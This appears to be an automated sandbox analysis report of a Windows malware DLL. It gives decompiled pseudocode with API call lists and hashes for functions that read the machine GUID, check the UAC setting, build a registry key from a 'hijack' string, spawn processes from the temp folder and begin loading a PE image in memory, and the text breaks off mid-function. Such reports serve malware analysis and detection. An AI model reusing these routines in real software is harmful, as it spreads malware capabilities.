                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .exe$baidu.exe
                                                                                                                                                      • API String ID: 3164538923-2273953317
                                                                                                                                                      • Opcode ID: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                      • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                      • Opcode Fuzzy Hash: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                      • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v311;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v575;
                                                                                                                                                      				char _v576;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      
                                                                                                                                                      				_t50 = __eflags;
                                                                                                                                                      				_t41 = __edi;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022ADF);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t43;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v576 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                      				_v312 = 0;
                                                                                                                                                      				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                      				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
                                                                                                                                                      				GetTempPathA(0x104,  &_v576);
                                                                                                                                                      				_push(E100011E0( &_a4));
                                                                                                                                                      				_push(E100011E0( &_v44));
                                                                                                                                                      				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
                                                                                                                                                      				E1001A1D0(_t50,  &_v312); // executed
                                                                                                                                                      				E100011A0( &_v44);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				_t30 = E100011A0( &_a4);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t30;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s 200 %s
                                                                                                                                                      • API String ID: 3552933064-2772210913
                                                                                                                                                      • Opcode ID: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction ID: fa445e4306be4de550b1f58f9f77f959fb08a7f600bfac00d2f80f5c48e4b5e6
                                                                                                                                                      • Opcode Fuzzy Hash: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction Fuzzy Hash: B01198B6C00208ABE714EB90DC56FDE777CEB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				char _v275;
                                                                                                                                                      				char _v276;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      
                                                                                                                                                      				_t37 = __eflags;
                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                      				_v276 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v275, 0, 0x103);
                                                                                                                                                      				_v12 = 0x104;
                                                                                                                                                      				E1001A2F0( &_v276,  &_v12); // executed
                                                                                                                                                      				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
                                                                                                                                                      				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
                                                                                                                                                      				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
                                                                                                                                                      				_t38 = _v8;
                                                                                                                                                      				if(_v8 != 0) {
                                                                                                                                                      					_push(_v8);
                                                                                                                                                      					return E1000CA30(__ebx, _t28, __esi, _t38);
                                                                                                                                                      				}
                                                                                                                                                      				return _t20;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001A2F0: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                      • API String ID: 3138967372-3622423033
                                                                                                                                                      • Opcode ID: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                      • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                      • Opcode Fuzzy Hash: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                      • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001D240() {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				int _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				long _t18;
                                                                                                                                                      				long _t21;
                                                                                                                                                      
                                                                                                                                                      				_v12 = 4;
                                                                                                                                                      				_v20 = 4;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_t18 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8); // executed
                                                                                                                                                      				if(_t18 == 0) {
                                                                                                                                                      					_t21 = RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20); // executed
                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                      						_v16 = 0 | _v24 == 0x00000001;
                                                                                                                                                      					}
                                                                                                                                                      					RegCloseKey(_v8);
                                                                                                                                                      				}
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
                                                                                                                                                      • EnableLUA, xrefs: 1001D296
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                      • API String ID: 3677997916-2194944742
                                                                                                                                                      • Opcode ID: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction ID: 5282c0b80e2e5c01901b155bdceaa9b4f75acfd53aa6edd49772c4382101ddc9
                                                                                                                                                      • Opcode Fuzzy Hash: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction Fuzzy Hash: EC01FFB5D00219FBEB04DFD1CD98BEEBBB8EB44305F108059E611BA280D7B59B04CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A2F0(char* _a4, int* _a8) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int* _v12;
                                                                                                                                                      				long _t11;
                                                                                                                                                      				long _t13;
                                                                                                                                                      
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                      					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
                                                                                                                                                      					if(_t13 == 0) {
                                                                                                                                                      						_v12 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					RegCloseKey(_v8); // executed
                                                                                                                                                      					return _v12;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                      • API String ID: 3677997916-880526231
                                                                                                                                                      • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                      • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F4A0(void* _a4, char* _a8) {
                                                                                                                                                      				char* _v8;
                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				struct _SYSTEMTIME _v32;
                                                                                                                                                      				char* _v40;
                                                                                                                                                      				char* _v44;
                                                                                                                                                      				struct _FILETIME _v52;
                                                                                                                                                      				long _t27;
                                                                                                                                                      				char* _t43;
                                                                                                                                                      
                                                                                                                                                      				_v44 = 0;
                                                                                                                                                      				_v40 = 0;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
                                                                                                                                                      				if(_t27 == 0) {
                                                                                                                                                      					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
                                                                                                                                                      						_v32.wYear = 0x7b2;
                                                                                                                                                      						_v32.wMonth = 1;
                                                                                                                                                      						_v32.wDay = 1;
                                                                                                                                                      						_v32.wHour = 0;
                                                                                                                                                      						_v32.wMinute = 0;
                                                                                                                                                      						_v32.wSecond = 0;
                                                                                                                                                      						_v32.wMilliseconds = 0;
                                                                                                                                                      						SystemTimeToFileTime( &_v32,  &_v52);
                                                                                                                                                      						_t43 = _v8;
                                                                                                                                                      						asm("sbb edx, [ebp-0x2c]");
                                                                                                                                                      						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
                                                                                                                                                      						_v40 = _t43;
                                                                                                                                                      					}
                                                                                                                                                      					RegCloseKey(_v16);
                                                                                                                                                      				}
                                                                                                                                                      				return _v44;
                                                                                                                                                      			}













                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3147484438-0
                                                                                                                                                      • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                      • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F3D0(char* _a4) {
                                                                                                                                                      				struct _SYSTEMTIME _v20;
                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                      				struct _FILETIME _v36;
                                                                                                                                                      				struct _FILETIME _v44;
                                                                                                                                                      				struct _FILETIME _v52;
                                                                                                                                                      				struct _FILETIME _v60;
                                                                                                                                                      				void* _v64;
                                                                                                                                                      				int _t28;
                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t44;
                                                                                                                                                      
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_t28 = PathFileExistsA(_a4); // executed
                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                      					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
                                                                                                                                                      					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
                                                                                                                                                      						_v20.wYear = 0x7b2;
                                                                                                                                                      						_v20.wMonth = 1;
                                                                                                                                                      						_v20.wDay = 1;
                                                                                                                                                      						_v20.wHour = 0;
                                                                                                                                                      						_v20.wMinute = 0;
                                                                                                                                                      						_v20.wSecond = 0;
                                                                                                                                                      						_v20.wMilliseconds = 0;
                                                                                                                                                      						SystemTimeToFileTime( &_v20,  &_v60);
                                                                                                                                                      						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                      						asm("sbb eax, [ebp-0x34]");
                                                                                                                                                      						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
                                                                                                                                                      						_v24 = _t44;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _v28;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.KERNELBASE(?), ref: 1001F3E8
                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                      • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3038978132-0
                                                                                                                                                      • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                      • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                      • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                      • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v279;
                                                                                                                                                      				char _v280;
                                                                                                                                                      				intOrPtr _v284;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				signed int _v316;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				intOrPtr _t52;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      
                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                      				_t50 = __edi;
                                                                                                                                                      				_t37 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022AB3);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t52;
                                                                                                                                                      				_v316 = 0;
                                                                                                                                                      				E10001160( &_v312, __eflags, 0x10024c8f);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v280 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v279, 0, 0x103);
                                                                                                                                                      				E1001DC00(__ebx, _t50, __esi,  &_v280); // executed
                                                                                                                                                      				_t46 =  &_v280;
                                                                                                                                                      				_t27 = E1000CAC0( &_v280);
                                                                                                                                                      				_t55 = _t52 - 0x12c + 0x10;
                                                                                                                                                      				_t59 = _t27;
                                                                                                                                                      				if(_t27 == 0) {
                                                                                                                                                      					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
                                                                                                                                                      					_t55 = _t55 + 0xc;
                                                                                                                                                      				}
                                                                                                                                                      				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
                                                                                                                                                      				E100011C0( &_v312, _v284);
                                                                                                                                                      				_push(_v284);
                                                                                                                                                      				E1000CA30(_t37, _t50, _t51, _t59);
                                                                                                                                                      				E10001110(_a4, _t59,  &_v312);
                                                                                                                                                      				_v316 = _v316 | 0x00000001;
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E100011A0( &_v312);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}















                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A794
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                        • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                        • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                        • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                      • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                      • String ID: unknown err
                                                                                                                                                      • API String ID: 3541540748-813478822
                                                                                                                                                      • Opcode ID: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
                                                                                                                                                      • Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
                                                                                                                                                      • Opcode Fuzzy Hash: 1afc326e267b248bed630016db321b3469e2e1c022afc86cb818c24d622b85b2
                                                                                                                                                      • Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                      			E004051A9(signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                      				void* _v3;
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				signed short* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				intOrPtr* _v36;
                                                                                                                                                      				void* _t102;
                                                                                                                                                      				intOrPtr _t149;
                                                                                                                                                      				void* _t156;
                                                                                                                                                      				void* _t158;
                                                                                                                                                      
                                                                                                                                                      				_v12 = _a4;
                                                                                                                                                      				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                      					_v36 = _a4 + _v12[0x1e];
                                                                                                                                                      					if( *_v36 == 0x4550) {
                                                                                                                                                      						_v16 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x3000, 4);
                                                                                                                                                      						if(_v16 != 0) {
                                                                                                                                                      							L7:
                                                                                                                                                      							_v28 = VirtualAlloc(0, 0x1c, 0x3000, 4);
                                                                                                                                                      							if(_v28 != 0) {
                                                                                                                                                      								 *((intOrPtr*)(_v28 + 4)) = _v16;
                                                                                                                                                      								 *(_v28 + 8) = 0;
                                                                                                                                                      								 *((intOrPtr*)(_v28 + 0xc)) = _a8;
                                                                                                                                                      								 *((intOrPtr*)(_v28 + 0x10)) = _a12;
                                                                                                                                                      								 *((intOrPtr*)(_v28 + 0x14)) = _a16;
                                                                                                                                                      								0x8958a00a();
                                                                                                                                                      								asm("sbb [edx+0x4], ch");
                                                                                                                                                      								_v8 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, ??);
                                                                                                                                                      								E004053A9(_v8, _v12, _v12[0x1e] +  *(_v36 + 0x54));
